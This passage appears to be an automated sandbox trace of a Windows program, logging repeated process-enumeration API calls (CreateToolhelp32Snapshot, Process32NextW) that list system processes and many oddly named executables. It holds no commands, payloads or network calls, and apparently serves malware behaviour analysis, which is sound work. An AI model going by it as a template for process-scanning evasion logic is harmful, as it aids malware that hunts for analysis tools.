szExeFile="svchost.exe")) returned 1 [0129.175] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.176] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.177] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.177] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.178] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0129.178] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.179] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0129.180] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0129.181] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.182] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.183] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0129.184] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0129.185] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0129.186] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0129.188] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.189] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0129.190] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0129.191] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0129.192] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0129.193] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0129.194] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0129.195] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0129.197] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0129.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0129.199] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0129.200] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0129.201] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0129.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0129.203] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0129.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0129.205] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0129.206] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0129.207] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0129.254] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0129.255] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0129.256] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.257] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0129.258] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0129.259] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0129.260] CloseHandle (hObject=0xbc) returned 1 [0129.260] Sleep (dwMilliseconds=0x12c) [0129.623] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0129.629] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.630] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0129.630] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0129.631] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0129.632] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0129.633] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0129.633] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0129.634] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0129.635] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0129.635] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0129.636] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.637] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.638] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.639] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.639] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.640] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0129.641] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.641] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.642] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0129.644] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.645] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.650] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0129.651] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0129.653] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0129.654] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.655] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.656] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0129.657] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0129.658] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0129.659] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0129.742] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0129.743] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0129.744] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0129.745] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0129.746] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0129.747] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0129.748] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0129.749] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0129.750] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0129.752] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0129.753] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0129.754] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0129.755] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, 